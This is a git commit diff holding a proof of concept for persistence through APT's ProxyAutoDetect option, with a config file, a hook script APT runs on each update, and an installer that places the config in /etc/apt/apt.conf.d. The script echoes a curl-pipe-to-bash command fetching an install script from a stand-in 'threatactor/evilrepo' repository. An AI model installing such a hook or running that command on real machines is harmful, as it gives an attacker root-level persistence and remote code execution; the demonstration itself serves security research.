first commit

poc/30detectproxy

@@ -0,0 +1,2 @@
+// Demonstration of ProxyAutoDetect persistence
+Acquire::http::ProxyAutoDetect "/absolute/path/to/detect-http-proxy";

poc/detect-http-proxy

@@ -0,0 +1,10 @@
+#!/bin/bash
+
+# This script is executed automatically by APT when Acquire::http::ProxyAutoDetect is configured.
+# It demonstrates how a threat actor could abuse this feature to execute arbitrary commands.
+
+echo "http://127.0.0.1:8888"  # stdout is interpreted as the proxy address
+
+# Simulated threat actor behavior
+echo "If I was a threat actor, I might do something like:" >&2
+echo "/usr/bin/curl -fsSk https://raw.githubusercontent.com/threatactor/evilrepo/main/install.sh | bash" >&2

poc/install.sh

@@ -0,0 +1,13 @@
+#!/bin/bash
+set -e
+
+BIN_PATH="$(pwd)/detect-http-proxy"
+CONF_PATH="/etc/apt/apt.conf.d/30detectproxy"
+
+echo "[*] Installing detect-http-proxy to ${BIN_PATH}"
+chmod +x detect-http-proxy
+
+echo "[*] Copying APT config to ${CONF_PATH}"
+sudo cp 30detectproxy $CONF_PATH
+
+echo "[*] Done. Now run: sudo apt update"